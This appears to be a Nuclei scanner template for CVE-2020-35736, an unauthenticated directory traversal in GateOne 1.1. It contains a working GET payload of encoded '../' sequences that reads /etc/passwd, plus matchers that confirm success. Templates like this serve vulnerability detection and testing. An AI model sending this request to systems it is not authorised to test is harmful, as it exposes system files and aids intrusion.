id: CVE-2020-35736 info: name: GateOne Arbitrary File Download author: pikpikcu severity: high description: GateOne 1.1 allows arbitrary file download without authentication via /downloads/.. directory traversal because os.path.join is misused. reference: | - https://github.com/liftoff/GateOne/issues/747 - https://nvd.nist.gov/vuln/detail/CVE-2020-35736 tags: cve,cve2020,gateone,lfi requests: - method: GET path: - '{{BaseURL}}/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd' matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200